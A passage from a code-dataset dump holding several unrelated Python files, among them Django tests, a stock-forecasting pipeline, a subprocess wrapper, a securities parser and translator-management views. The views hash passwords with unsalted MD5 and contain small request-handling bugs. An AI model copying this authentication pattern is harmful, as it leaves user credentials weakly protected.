最小K个数.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19019502913","text":"from django.test import Client, TestCase\nfrom django.urls import reverse\nfrom ..models import User\nfrom ..models import Follow\n\n\nclass TestFollow(TestCase):\n    \"\"\"Tests for the follow feature\"\"\"\n    @classmethod\n    def setUpClass(cls):\n        cls.user = User.objects.create_user(username='follower')\n        cls.author = User.objects.create_user(username='following')\n\n    @classmethod\n    def tearDownClass(cls):\n        super().tearDownClass()\n\n    def setUp(self):\n        self.client1 = Client()\n        self.client1.force_login(self.user)\n        self.client2 = Client()\n        self.client2.force_login(self.author)\n\n    def test_follow(self):\n        follow_count = Follow.objects.all().count()\n        self.client1.get(\n            reverse(\n                'posts:profile_follow',\n                kwargs={'username': self.author.username}\n            )\n        )\n        self.assertEqual(Follow.objects.all().count(), follow_count + 1)\n\n    def test_unfollow(self):\n        follow_count = Follow.objects.all().count()\n        self.client1.get(\n            reverse(\n                'posts:profile_follow',\n                kwargs={'username': self.author.username}\n            )\n        )\n        self.assertEqual(Follow.objects.all().count(), follow_count + 1)\n        follow_cnt = Follow.objects.all().count()\n        self.client2.get(\n            reverse(\n                'posts:profile_unfollow',\n                kwargs={'username': self.author.username}\n            )\n        )\n        self.assertEqual(Follow.objects.all().count(), follow_cnt)\n","repo_name":"NotFound35/hw05_final","sub_path":"yatube/posts/tests/test_follow.py","file_name":"test_follow.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3114573774","text":"'''\nCreated on May 18, 2021\n\n@author: zollen\n'''\n\nimport pandas_datareader.data as web\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nimport itertools\nfrom statsmodels.tsa.seasonal import STL\nimport matplotlib.pyplot as plt\nfrom statsmodels.graphics.tsaplots import plot_pacf\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom statsmodels.tsa.stattools import adfuller\nfrom sklearn.metrics import mean_squared_error\nfrom kedro.pipeline import node\nfrom kedro.pipeline import Pipeline\nfrom kedro.io import DataCatalog, MemoryDataSet\nfrom kedro.runner import SequentialRunner\nimport seaborn as sb\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\nsb.set_style('whitegrid')\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\nSHOW_GRAPHS = False\nWEEKS_FOR_ANALYSIS = 72\nTRAIN_SIZE=2120\nTEST_SIZE = 14\nTIME_SPLITS_CV = 6\nTICKER = 'VVL.TO'\n\n\ndef perform_adf_test(series):\n result = adfuller(series)\n print('ADF Statistic: %f' % result[0])\n print('p-value: %f' % result[1])\n \ndef get_stock():\n start_date, end_date = datetime.now().date() - timedelta(weeks=WEEKS_FOR_ANALYSIS), datetime.now().date()\n vvl = web.DataReader(TICKER, 'yahoo', start=start_date, end=end_date).Close\n dwi = web.DataReader('^DJI', 'yahoo', start=start_date, end=end_date).Close\n spi = web.DataReader('^GSPTSE', 'yahoo', start=start_date, end=end_date).Close\n vvl.index = [d.date() for d in vvl.index]\n \n prices = pd.DataFrame({'Date' : vvl.index, \n 'VVL.TO' : vvl.values, \n 'DOW': dwi[vvl.index].values,\n 'TSX': spi[vvl.index].values })\n \n prices['Date'] = pd.to_datetime(prices['Date'])\n prices = prices.set_index('Date')\n prices = 
prices.asfreq(pd.infer_freq(prices.index), method=\"pad\")\n prices['VVL.TO'] = prices['VVL.TO'].astype('float64')\n prices['DOW'] = prices['DOW'].astype('float64')\n prices['TSX'] = prices['TSX'].astype('float64')\n \n prices['DOW'] = prices['DOW'].fillna(method='ffill', axis=0)\n \n \n return prices\n\ngetStockNode = node(get_stock, inputs=None, outputs=\"trade_data\")\n\n\ndef analysis_data(trade_data):\n \n if False:\n _, (a1, a2, a3, a4, a5) = plt.subplots(5, 1,figsize=(15,8))\n a1.plot(trade_data['VVL.TO'])\n a1.set_ylabel('VVL.TO', fontsize=8)\n a2.plot(trade_data['DOW'])\n a2.set_ylabel('DOW', fontsize=8)\n a3.plot(trade_data['TSX'])\n a3.set_ylabel('TSX', fontsize=8)\n \n print(trade_data[['VVL.TO', 'DOW', 'TSX']].corr())\n \n sb.regplot(x=\"VVL.TO\", y=\"DOW\", data=trade_data, \n marker='.', fit_reg = False, scatter_kws = {'alpha' : 0.8}, ax=a4)\n sb.regplot(x=\"VVL.TO\", y=\"TSX\", data=trade_data, \n marker='.', fit_reg = False, scatter_kws = {'alpha' : 0.8}, ax=a5)\n \n trade_data['VVL.TO'] = trade_data['VVL.TO'].diff()\n trade_data['DOW'] = trade_data['DOW'].diff()\n trade_data['TSX'] = trade_data['TSX'].diff()\n trade_data.dropna(inplace = True)\n \n if False: \n perform_adf_test(trade_data['VVL.TO'])\n perform_adf_test(trade_data['DOW'])\n perform_adf_test(trade_data['TSX'])\n \n \n if False:\n # inconclusive\n _, a1 = plt.subplots(1, 1)\n a1.set_ylabel('NORMALIZE(VVL.TO)', fontsize=8)\n plot_pacf(trade_data['VVL.TO'], ax=a1, title=\"PACF Analysis of VVL.TO\")\n \n if False:\n stl = STL(trade_data['VVL.TO'])\n result = stl.fit()\n \n seasonal, trend, resid = result.seasonal, result.trend, result.resid\n \n plt.figure(figsize=(8,6))\n \n plt.subplot(4,1,1)\n plt.plot(trade_data['VVL.TO'])\n plt.title('Original Series', fontsize=16)\n \n plt.subplot(4,1,2)\n plt.plot(trend)\n plt.title('Trend', fontsize=16)\n \n plt.subplot(4,1,3)\n plt.plot(seasonal)\n plt.title('Seasonal', fontsize=16)\n \n plt.subplot(4,1,4)\n plt.plot(resid)\n plt.title('Residual', fontsize=16)\n \n plt.tight_layout()\n\n \n \n\nanalysisNode = node(analysis_data, inputs=[\"trade_data\"], outputs=None)\n\n\n\ndef optimize_model(trade_data):\n \n if True: \n params = []\n aics = []\n mses = []\n \n p = [0, 1, 2, 3, 4]\n q = [0, 1, 2, 3, 4]\n pp = [ 0, 1, 2, 3, 4 ]\n qq = [ 0, 1, 2, 3, 4 ]\n ss = [ 1, 2, 3, 4, 5 ]\n pdq = list(itertools.product(p, [1], q))\n spqd = list(itertools.product(pp, [1], qq, ss))\n pdq.remove((0,1,0))\n \n total = len(pdq) * len(spqd)\n count = 0\n \n for param in pdq:\n \n for sparam in spqd:\n \n try:\n \n count += 1\n print(\"PROGRESS: \", (count / total) * 100, \"%\")\n \n tscv = TimeSeriesSplit(n_splits=TIME_SPLITS_CV, max_train_size=TRAIN_SIZE, test_size=TEST_SIZE)\n aics_t = []\n mses_t = []\n for train_index, test_index in tscv.split(trade_data):\n \n X_train, X_test = trade_data.iloc[train_index], trade_data.iloc[test_index]\n \n model = SARIMAX(X_train['VVL.TO'],\n order=param,\n seasonal_order=sparam,\n enforce_stationarity=False,\n enforce_invertibility=False)\n results = model.fit() \n \n pred = results.get_prediction(start = X_test.index[0],\n end = X_test.index[-1])\n \n aics_t.append(results.aic)\n mses_t.append(mean_squared_error(X_test['VVL.TO'].iloc[:-1], pred.predicted_mean[1:])) \n \n params.append((param, sparam))\n aics.append(np.sum(aics_t) / len(aics_t))\n mses.append(np.sum(mses_t) / len(mses_t)) \n \n except:\n continue\n \n \n min_ind = aics.index(min(aics)) \n bestparam = params[min_ind]\n print('best_param_aic:', bestparam, ' aic:', min(aics)) \n min_ind 
= mses.index(min(mses)) \n bestparam = params[min_ind]\n print('best_param_mse:', bestparam, ' mse:', min(mses))\n \n '''\n best_param_aic: (2, 1, 2)(0, 0, 0, 0) aic: 30.706256895869064\n best_param_mse: (2, 1, 2)(0, 0, 0, 0) mse: 0.14321048365277564\n \n best_param_aic: (3, 1, 5)(2, 1, 2, 12) aic: 557.9136442544652\n best_param_mse: (4, 1, 5)(2, 1, 2, 12) mse: 0.15319565381354142\n '''\n\noptimizeNode = node(optimize_model, inputs=[\"trade_data\"], outputs=None)\n\n\n\ndef test_model(trade_data):\n '''\n (2, 1, 2)(2, 1, 2, 3): 0.0785\n (2, 1, 2)(2, 1, 2, 4): 0.1442\n (3, 1, 3)(2, 1, 2, 4): 0.1391\n (3, 1, 3)(1, 1, 1, 4): 0.1391\n '''\n \n G_train = trade_data.iloc[-(TEST_SIZE)*2:]\n X_train = trade_data.iloc[-TRAIN_SIZE-TEST_SIZE:-TEST_SIZE]\n X_test = trade_data.iloc[-TEST_SIZE:]\n \n model = SARIMAX(X_train['VVL.TO'],\n order=(2, 1, 2),\n seasonal_order=(3, 1, 3, 4),\n enforce_stationarity=False,\n enforce_invertibility=False)\n results = model.fit() \n \n preds = results.get_prediction(start = X_test.index[0],\n end = X_test.index[-1] + timedelta(days = 1))\n \n print(\"RMSE: %0.4f\" % np.sqrt((mean_squared_error(X_test['VVL.TO'], preds.predicted_mean[1:]))))\n \n if True:\n plt.figure(figsize=(10,4))\n plt.plot(G_train['VVL.TO'])\n plt.plot(X_test.index, preds.predicted_mean[1:])\n plt.legend(('Data', 'Predictions'), fontsize=16)\n plt.title(\"Price vs Prediction\", fontsize=20)\n plt.ylabel('Price', fontsize=16) \n \n \n \n\ntestNode = node(test_model, inputs=[\"trade_data\"], outputs=None)\n\n# Create a data source\ndata_catalog = DataCatalog({\"trade_data\": MemoryDataSet()})\n\n# Assign \"nodes\" to a \"pipeline\"\npipeline = Pipeline([ \n getStockNode,\n analysisNode,\n # optimizeNode,\n testNode\n ])\n\n# Create a \"runner\" to run the \"pipeline\"\nrunner = SequentialRunner()\n\n# Execute a pipeline\nrunner.run(pipeline, data_catalog)\n\n\nplt.show()","repo_name":"zollen/Python-ML","sub_path":"time_series/analysis3_vvl.py","file_name":"analysis3_vvl.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22926663355","text":"# encoding: utf-8\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)\n#\nfrom __future__ import absolute_import, division, unicode_literals\n\nimport os\nimport platform\nimport subprocess\n\nfrom mo_dots import set_default, wrap, Null\nfrom mo_logs import Log, strings\nfrom mo_logs.exceptions import Except\nfrom mo_threads.lock import Lock\nfrom mo_threads.queues import Queue\nfrom mo_threads.signals import Signal\nfrom mo_threads.threads import THREAD_STOP, Thread\nfrom mo_threads.till import Till\nfrom mo_times import Timer\n\nDEBUG = True\n\n\nclass Process(object):\n def __init__(self, name, params, cwd=None, env=None, debug=False, shell=False, bufsize=-1):\n self.name = name\n self.service_stopped = Signal(\"stopped signal for \" + strings.quote(name))\n self.stdin = Queue(\"stdin for process \" + strings.quote(name), silent=True)\n self.stdout = Queue(\"stdout for process \" + strings.quote(name), silent=True)\n self.stderr = Queue(\"stderr for process \" + strings.quote(name), silent=True)\n\n try:\n if cwd == None:\n cwd = os.getcwd()\n else:\n cwd = str(cwd)\n\n self.debug = debug or DEBUG\n self.service = service = subprocess.Popen(\n [str(p) for p in params],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n bufsize=bufsize,\n cwd=cwd,\n env={str(k): str(v) for k, v in set_default(env, os.environ).items()},\n shell=shell\n )\n\n self.please_stop = Signal()\n self.please_stop.then(self._kill)\n self.child_locker = Lock()\n self.children = [\n Thread.run(self.name + \" stdin\", self._writer, service.stdin, self.stdin, please_stop=self.service_stopped, parent_thread=self),\n Thread.run(self.name + \" stdout\", self._reader, \"stdout\", service.stdout, self.stdout, please_stop=self.service_stopped, parent_thread=self),\n Thread.run(self.name + \" stderr\", self._reader, \"stderr\", service.stderr, self.stderr, please_stop=self.service_stopped, parent_thread=self),\n Thread.run(self.name + \" waiter\", self._monitor, parent_thread=self),\n ]\n except Exception as e:\n Log.error(\"Can not call\", e)\n\n self.debug and Log.note(\"{{process}} START: {{command}}\", process=self.name, command=\" \".join(map(strings.quote, params)))\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.join(raise_on_error=True)\n\n def stop(self):\n self.stdin.add(THREAD_STOP) # ONE MORE SEND\n self.please_stop.go()\n\n def join(self, raise_on_error=False):\n self.service_stopped.wait()\n with self.child_locker:\n child_threads, self.children = self.children, []\n for c in child_threads:\n c.join()\n if raise_on_error and self.returncode != 0:\n Log.error(\n \"{{process}} FAIL: returncode={{code}}\\n{{stderr}}\",\n process=self.name,\n code=self.service.returncode,\n stderr=list(self.stderr)\n )\n return self\n\n def remove_child(self, child):\n with self.child_locker:\n try:\n self.children.remove(child)\n except Exception:\n pass\n\n @property\n def pid(self):\n return self.service.pid\n\n @property\n def returncode(self):\n return self.service.returncode\n\n def _monitor(self, please_stop):\n with Timer(self.name):\n self.service.wait()\n self.debug and Log.note(\"{{process}} STOP: returncode={{returncode}}\", process=self.name, returncode=self.service.returncode)\n self.service_stopped.go()\n please_stop.go()\n\n def _reader(self, name, pipe, receive, please_stop):\n try:\n while not please_stop and self.service.returncode is None:\n 
line = to_text(pipe.readline().rstrip())\n if line:\n receive.add(line)\n self.debug and Log.note(\"{{process}} ({{name}}): {{line}}\", name=name, process=self.name, line=line)\n else:\n (Till(seconds=1) | please_stop).wait()\n\n # GRAB A FEW MORE LINES\n max = 100\n while max:\n try:\n line = to_text(pipe.readline().rstrip())\n if line:\n max = 100\n receive.add(line)\n self.debug and Log.note(\"{{process}} RESIDUE: ({{name}}): {{line}}\", name=name, process=self.name, line=line)\n else:\n max -= 1\n except Exception:\n break\n finally:\n pipe.close()\n receive.add(THREAD_STOP)\n self.debug and Log.note(\"{{process}} ({{name}} is closed)\", name=name, process=self.name)\n\n receive.add(THREAD_STOP)\n\n def _writer(self, pipe, send, please_stop):\n while not please_stop:\n line = send.pop(till=please_stop)\n if line is THREAD_STOP:\n please_stop.go()\n break\n elif line is None:\n continue\n\n self.debug and Log.note(\"{{process}} (stdin): {{line}}\", process=self.name, line=line.rstrip())\n pipe.write(line.encode('utf8') + b\"\\n\")\n pipe.flush()\n\n def _kill(self):\n try:\n self.service.kill()\n Log.note(\"Service was successfully terminated.\")\n except Exception as e:\n ee = Except.wrap(e)\n if 'The operation completed successfully' in ee:\n return\n if 'No such process' in ee:\n return\n\n Log.warning(\"Failure to kill process {{process|quote}}\", process=self.name, cause=ee)\n\n\nWINDOWS_ESCAPE_DCT = {\n u\"%\": u\"%%\",\n u\"&\": u\"^&\",\n u\"\\\\\": u\"^\\\\\",\n u\"<\": u\"^<\",\n u\">\": u\"^>\",\n u\"^\": u\"^^\",\n u\"|\": u\"^|\",\n u\"\\t\": u\"^\\t\",\n u\"\\n\": u\"^\\n\",\n u\"\\r\": u\"^\\r\",\n u\" \": u\"^ \",\n}\n\nPROMPT = \"READY_FOR_MORE\"\n\nif \"windows\" in platform.system().lower():\n # def cmd_escape(v):\n # return \"\".join(WINDOWS_ESCAPE_DCT.get(c, c) for c in v)\n cmd_escape = strings.quote\n\n def set_prompt():\n return \"prompt \"+PROMPT+\"$g\"\n\n def cmd():\n return \"%windir%\\\\system32\\\\cmd.exe\"\n\n def to_text(value):\n return value.decode(\"latin1\")\n\nelse:\n cmd_escape = strings.quote\n\n def set_prompt():\n return \"set prompt=\"+cmd_escape(PROMPT+\">\")\n\n def cmd():\n return \"bash\"\n\n def to_text(value):\n return value.decode(\"latin1\")\n\n\nclass Command(object):\n \"\"\"\n FASTER Process CLASS - OPENS A COMMAND_LINE APP (CMD on windows) AND KEEPS IT OPEN FOR MULTIPLE COMMANDS\n EACH WORKING DIRECTORY WILL HAVE ITS OWN PROCESS, MULTIPLE PROCESSES WILL OPEN FOR THE SAME DIR IF MULTIPLE\n THREADS ARE REQUESTING Commands\n \"\"\"\n\n available_locker = Lock(\"cmd lock\")\n available_process = {}\n\n def __init__(self, name, params, cwd=None, env=None, debug=False, shell=False, bufsize=-1):\n shell = True\n self.name=name\n self.key = (cwd, wrap(env), debug, shell)\n self.stdout = Queue(\"stdout for \"+name)\n self.stderr = Queue(\"stderr for \"+name)\n\n with Command.available_locker:\n avail = Command.available_process.setdefault(self.key, [])\n if not avail:\n self.process = Process(\"command shell\", [cmd()], cwd, env, debug, shell, bufsize)\n self.process.stdin.add(set_prompt())\n self.process.stdin.add(\"echo %errorlevel%\")\n _wait_for_start(self.process.stdout, Null)\n else:\n self.process = avail.pop()\n\n self.process.stdin.add(\" \".join(cmd_escape(p) for p in params))\n self.process.stdin.add(\"echo %errorlevel%\")\n self.stdout_thread = Thread.run(\"\", self._stream_relay, self.process.stdout, self.stdout)\n self.stderr_thread = Thread.run(\"\", self._stream_relay, self.process.stderr, self.stderr)\n self.returncode = 
None\n\n def join(self, raise_on_error=False, till=None):\n try:\n try:\n # WAIT FOR COMMAND LINE RESPONSE ON stdout\n self.stdout_thread.join()\n except Exception as e:\n Log.error(\"unexpected problem processing stdout\", cause=e)\n\n try:\n self.stderr_thread.please_stop.go()\n self.stderr_thread.join()\n except Exception as e:\n Log.error(\"unexpected problem processing stderr\", cause=e)\n\n if raise_on_error and self.returncode != 0:\n Log.error(\n \"{{process}} FAIL: returncode={{code}}\\n{{stderr}}\",\n process=self.name,\n code=self.returncode,\n stderr=list(self.stderr)\n )\n return self\n finally:\n with Command.available_locker:\n Command.available_process[self.key].append(self.process)\n\n\n def _stream_relay(self, source, destination, please_stop=None):\n \"\"\"\n :param source:\n :param destination:\n :param error: Throw error if line shows up\n :param please_stop:\n :return:\n \"\"\"\n prompt_count = 0\n prompt = PROMPT + \">\"\n line_count = 0\n\n while not please_stop:\n value = source.pop(till=please_stop)\n if value is None:\n destination.add(THREAD_STOP)\n return\n elif value is THREAD_STOP:\n destination.add(THREAD_STOP)\n return\n elif line_count==0 and \"is not recognized as an internal or external command\" in value:\n Log.error(\"Problem with command: {{desc}}\", desc=value)\n elif value.startswith(prompt):\n if prompt_count:\n # GET THE ERROR LEVEL\n self.returncode = int(source.pop(till=please_stop))\n destination.add(THREAD_STOP)\n return\n else:\n prompt_count += 1\n else:\n line_count += 1\n destination.add(value)\n\n\ndef _wait_for_start(source, destination):\n prompt = PROMPT + \">\"\n\n while True:\n value = source.pop()\n if value.startswith(prompt):\n # GET THE ERROR LEVEL\n returncode = int(source.pop())\n destination.add(THREAD_STOP)\n return\n destination.add(value)\n","repo_name":"mozilla/jx-sqlite","sub_path":"vendor/mo_threads/multiprocess.py","file_name":"multiprocess.py","file_ext":"py","file_size_in_byte":10972,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"21"} +{"seq_id":"37563434691","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author : yanpan\n# @Time : 2022/8/19 15:01\n# @Site : \n# @File : dfcf_securities_parsing.py\n# @Software: PyCharm\nfrom data.ms.genralhandler import *\n\n\ndef dfcf_parsing_data(rs, data_):\n bzj_data = []\n rz_data = []\n rq_data = []\n rzrq_data = []\n stockgroup_data = []\n if rs[2] == '2':\n logger.info(f'东方财富证券可充抵保证金证券解析开始...')\n for data in data_:\n market = data[3]\n sec_code = data[0]\n sec_name = data[1]\n # rate = round(float(str(data[2]).strip('%')), 3)\n rate = rate_is_normal_two(data[2])\n bzj_data.append([market, sec_code, sec_name, rate])\n securities_bzj_parsing_data(rs, 3, bzj_data)\n logger.info(f'东方财富证券可充抵保证金证券解析结束...')\n time.sleep(5)\n logger.info(f'东方财富证券集中度分组数据解析开始...')\n # 集中度分组数据解析\n for _data in data_:\n market =_data[3]\n sec_code = _data[0]\n sec_name = _data[1]\n stockgroup_name = None\n stock_group = _data[4]\n if stock_group == 'A组':\n stockgroup_name = 1\n elif stock_group == 'B组':\n stockgroup_name = 2\n elif stock_group == 'C组':\n stockgroup_name = 3\n elif stock_group == 'D组':\n stockgroup_name = 4\n elif stock_group == 'E组':\n stockgroup_name = 5\n elif stock_group == 'F组':\n stockgroup_name = 6\n else:\n stockgroup_name = 0\n stockgroup_data.append([market, sec_code, sec_name, stockgroup_name])\n\n securities_stockgroup_parsing_data(rs, 4, stockgroup_data)\n logger.info(f'东方财富证券集中度分组数据解析结束...')\n\n elif rs[2] == '3':\n 
logger.info(f'东方财富证券融资融券标的证券解析开始...')\n for data in data_:\n sec_code = data[0]\n sec_name = data[1]\n # rz_rate = round(float(str(data[2]).strip('%')), 3)\n # rq_rate = round(float(str(data[3]).strip('%')), 3)\n rz_rate = rate_is_normal_two(data[2])\n rq_rate = rate_is_normal_two(data[3])\n rzrq_data.append([sec_code, sec_name, rz_rate, rq_rate])\n\n temp_data = securities_normal_parsing_data(rzrq_data)\n for temp in temp_data:\n if len(temp) == 6:\n rz_data.append([temp[0], temp[1], temp[2], temp[4], temp[5]])\n rq_data.append([temp[0], temp[1], temp[3], temp[4], temp[5]])\n else:\n logger.error(f'该条记录无证券id{temp},需人工修复!')\n\n logger.info(f'东方财富证券融资标的证券解析开始...')\n securities_rzrq_parsing_data(rs, 1, rz_data)\n logger.info(f'东方财富证券融资标的证券解析结束...')\n\n time.sleep(5)\n logger.info(f'东方财富证券融券标的证券解析开始...')\n securities_rzrq_parsing_data(rs, 2, rq_data)\n logger.info(f'东方财富证券融券标的证券解析结束...')\n\n logger.info(f'东方财富证券融资融券标的证券解析结束...')\n\n","repo_name":"ljcute/data-parsing","sub_path":"data/ms/securities/dfcf_securities_parsing.py","file_name":"dfcf_securities_parsing.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74532140532","text":"import json\nimport ndjson\nimport zipfile\nimport lxml, lxml.etree\nfrom rich.progress import track\n\nz = zipfile.ZipFile(\"xml_pd.zip\")\nparser = lxml.etree.XMLParser(resolve_entities=False)\n\nDATA = {}\nISSUES = []\nfor file_info in track(z.infolist()):\n file_contents = z.read(file_info)\n try:\n doc = lxml.etree.fromstring(file_contents, parser)\n levels = []\n for i_d1, d1 in enumerate(doc.xpath(\"text/body/div\")):\n levels.append(str(i_d1 + 1))\n for i_d2, d2 in enumerate(d1.xpath(\"div\")):\n levels.append(f\"{i_d1+1}.{i_d2+1}\")\n DATA[file_info.filename] = levels\n except lxml.etree.XMLSyntaxError:\n ISSUES.append(file_info.filename)\n\nopen(\"dbnl.ndjson\", \"w\").write(ndjson.dumps(DATA.items()))\n","repo_name":"epoz/dts-hackathon-2021","sub_path":"parse_tei.py","file_name":"parse_tei.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30488342033","text":"# Regex = Regular Expression\n# a-z\n# 0-9\n# . _ at a 1 time\n# @ at a 1 time\n# . at 2, 3 index\n\nimport re # re = regular expression\n\n# ^ symbol for start in regex\n# [] for enclosed condition\n# + symbol for add condition in regex\n# \\ symbol for searching in regex\n# ? 
makes the preceding element optional (matches it zero or one time)\n# \\w matches a word character (letter, digit or underscore)\n# $ anchors the match at the end of the string\nemail_condition = \"^[a-z]+[\\._]?[a-z 0-9]+[@]\\w+[.]\\w{2,3}$\"\nuser_email = input(\"Enter Your Email Here: \")\n\nif re.search(email_condition, user_email):\n print(\"Yup, Email is Valid!\")\nelse:\n print(\"Email is Invalid!\")","repo_name":"Fakher-Zaman/Python-Projects","sub_path":"Email_Validation_Using_Regex.py","file_name":"Email_Validation_Using_Regex.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37845475898","text":"from django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nfrom .models import Translator, TranslatorAuth\r\nfrom orders.models import Order\r\nfrom .utils.Utils import *\r\nfrom manager.models.Manager import ManagerAuth\r\nfrom manager.utils.Utils import send_push_notification\r\nfrom registration.models.Client import Client, ClientAuth\r\nfrom registration.utils.Utils import converter_ru_to_lt\r\nimport datetime\r\nimport hashlib\r\n\r\n\r\ndef index(request):\r\n all_translators = Translator.objects.all()\r\n return render(request, 'translator/index.html', locals())\r\n\r\n\r\ndef new(request):\r\n if \"name\" not in request.POST or \"surname\" not in request.POST or \"email\" not in request.POST \\\r\n or \"phone\" not in request.POST or \"direction\" not in request.POST \\\r\n or \"username\" not in request.POST or \"password\" not in request.POST \\\r\n or \"mid\" not in request.POST or \"token\" not in request.POST or 'languages' not in request.POST:\r\n return JsonResponse({\"response\": \"f_error\", \"id\": \"\"})\r\n try:\r\n manager = ManagerAuth.objects.get(m_id=request.POST[\"mid\"])\r\n except ManagerAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if manager.token != request.POST['token']:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if Translator.objects.filter(phone=request.POST['phone']).exists():\r\n return JsonResponse({\"response\": \"ex_error\", \"id\": \"\"})\r\n translator = Translator()\r\n translator.name = request.POST['name']\r\n translator.surname = request.POST['surname']\r\n translator.email = request.POST['email']\r\n translator.phone = request.POST['phone']\r\n translator.direction = request.POST['direction']\r\n translator.languages = request.POST['languages']\r\n tmp_id = '{0}{1}{2}'.format(translator.surname[0], translator.name[0], translator.phone)\r\n translator.t_id = converter_ru_to_lt(tmp_id)\r\n translator.reg_date = datetime.date.today().strftime(\"%d.%m.%Y\")\r\n translator.busy = \"0\"\r\n translator.save()\r\n hash_pswd = hashlib.md5(request.POST['password'].encode('utf-8')).hexdigest()\r\n translator_auth = TranslatorAuth()\r\n translator_auth.t_id = translator.t_id\r\n translator_auth.username = request.POST[\"username\"].lower()\r\n translator_auth.password = hash_pswd\r\n translator_auth.save()\r\n return JsonResponse({\"response\": \"ok\", \"id\": translator.t_id})\r\n\r\n\r\ndef authentication(request):\r\n if 'username' not in request.POST or 'password' not in request.POST:\r\n return JsonResponse({\"response\": \"f_error\", \"id\": \"\", \"token\": \"\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(username=request.POST['username'].lower())\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"id\": \"\", \"token\": \"\"})\r\n hash_psw = 
hashlib.md5(request.POST['password'].encode('utf-8')).hexdigest()\r\n if hash_psw != translator_auth.password:\r\n return JsonResponse({\"response\": \"denied\", \"id\": \"\", \"token\": \"\"})\r\n new_token = generate_token()\r\n t_id = translator_auth.t_id\r\n translator_auth.token = new_token\r\n translator_auth.save()\r\n return JsonResponse({\"response\": \"access\", \"id\": t_id, \"token\": new_token})\r\n\r\n\r\ndef de_authentication(request):\r\n # TODO: удалить токен и указать что не онлайн.\r\n return JsonResponse({\"response\": \"OK\"})\r\n\r\n\r\ndef get_archive(request):\r\n if 'oid' not in request.GET:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n # TODO: Добавить проверку на ошибку \"field_error\" в FTST\r\n oid = request.POST['oid']\r\n try:\r\n order = Order.objects.get(o_id=oid)\r\n except Order.DoesNotExist:\r\n return JsonResponse({\"response\": \"order not exist\"})\r\n return take_response_for_archive(order.arch_path)\r\n\r\n\r\ndef send_archive(request):\r\n if 'tid' not in request.POST or 'token' not in request.POST or 'oid' not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\", \"data\": \"\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST['tid'])\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\", \"data\": \"\"})\r\n if request.POST['token'] != translator_auth.token:\r\n return JsonResponse({\"response\": \"error_t\", \"data\": \"\"})\r\n try:\r\n translator = Translator.objects.get(t_id=translator_auth.t_id)\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"error_itb\", \"data\": \"\"})\r\n archive = Order.objects.get(o_id=request.POST['oid']).arch_path\r\n if send_arch_to_email(translator.email,\r\n 'Файл заказа id:' + request.POST['oid'],\r\n 'Добрый день \\n Файл по вложении!',\r\n archive):\r\n return JsonResponse({\"response\": \"send_email_ok\", \"data\": translator.email})\r\n else:\r\n return JsonResponse({\"response\": \"error_send\"})\r\n\r\n\r\ndef get_orders(request):\r\n if 'tid' not in request.POST or 'token' not in request.POST:\r\n return JsonResponse({\"response\": \"error_f\"})\r\n try:\r\n translator_auth = TranslatorAuth.objects.get(t_id=request.POST['tid'])\r\n except TranslatorAuth.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n if request.POST['token'] != translator_auth.token:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n translator = Translator.objects.get(t_id=request.POST['tid'])\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"denied\"})\r\n try:\r\n orders = translator.order_set.filter(status=3)\r\n # orders = translator.orders.all().filter(orders__status='2')\r\n except Translator.DoesNotExist:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n if len(orders) == 0:\r\n return JsonResponse({\"response\": \"no_orders\"})\r\n orders_dict = {}\r\n orders_records = []\r\n orders_dict[\"response\"] = \"ok\"\r\n for translators_orders in orders:\r\n order_id = translators_orders.o_id\r\n order_date_end = translators_orders.date_end\r\n order_lang = translators_orders.lang_from + '-' + translators_orders.lang_to\r\n order_direction = translators_orders.direction\r\n order_pages = translators_orders.pages\r\n order_price = translators_orders.price_to_translator\r\n record = {\"id\": order_id, \"deadline\": order_date_end, \"language\": order_lang,\r\n \"direction\": order_direction, \"pageCount\": order_pages, \"price\": order_price}\r\n 
